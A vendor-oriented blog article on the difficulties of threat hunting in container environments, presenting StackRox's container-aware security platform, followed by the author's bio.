Threat Hunting in a Container Environment

It’s a vicious world out there, with new and innovative threats around every corner. As organizations—particularly larger enterprises—move to cloud computing and adopt DevOps practices and container technologies, though, the challenge of threat hunting effectively becomes more complex and difficult. A container environment is very dynamic, and protecting it requires a security solution that is equally agile.

When it comes to protecting containers, the security landscape of a large enterprise poses a couple primary challenges. First, traditional network security tools don’t fully work for containers. A traditional web application firewall (WAF) intercepts data from a network interface and analyzes the data flowing through it. A standard WAF, however, is not enough to cover the broader attack surface of containerized web applications that extends beyond the network, such as APIs and endpoints. It can also have a harder time keeping up with the dynamic, ephemeral context of containers that are not tied to any specific server and may be running from various locations from moment to moment.

A host-based approach or network security tool that isn’t container-aware runs into similar issues. These tools have no visibility or awareness of the container environment and can’t establish context across a distributed environment. In the end, there is no visibility into containers or container traffic, which makes application security essentially impossible.

Effective security in a container environment requires a security tool that is container-aware and has the agility to adapt quickly. StackRox developed a container security platform that helps enterprises threat hunt by automating and accelerating incident response workflows with detailed context about the container environment, analysis by multiple machine learning models and easy-to-use security policy management.

That is not a trivial task. Indicators of attack or compromise that security tools or professionals normally look for are remarkably difficult to identify in a container environment. A single app can be spread across multiple microservices and containers—possibly running across multiple servers. Containers are also ephemeral—rapidly spawning and disappearing as demand changes, which means a specific container may no longer exist by the time the security team attempts to investigate the root cause of an incident.

Companies need a solution that allows them to piece together security events across a distributed architecture in a highly dynamic and ever-changing environment. StackRox provides a platform to automatically analyze the context and history of containers and develop new policies to prevent future incidents. It uses machine learning to create an adaptive security feedback loop. StackRox also provides the tools and mechanisms to capture information from containers and enable root cause analysis of incidents. With StackRox, you can pause or suspend a container for analysis, extract more context around an identified indicator or capture context that is valuable for more granular analysis.

There are many benefits to cloud computing—financial, operational, and strategic—and there are even more advantages that come from DevOps and containers. To leverage those benefits, though, security still has to be a primary consideration. It’s important to implement intelligent, agile security tools that are capable of keeping pace with a dynamic container environment and can still provide the necessary visibility and context for effective security.

Tony Bradley

I have a passion for technology and gadgets--with a focus on Microsoft and security--and a desire to help others understand how technology can affect or improve their lives. I also love spending time with my wife, 7 kids, 2 dogs, 5 cats, 3 rabbits, 2 ferrets, pot-bellied pig and sulcata tortoise, and I like to think I enjoy reading and golf even though I never find time for either. You can contact me directly at tony@techspective.net. For more from me, you can follow me on Twitter and Facebook.

Tony Bradley has 45 posts and counting. See all posts by Tony Bradley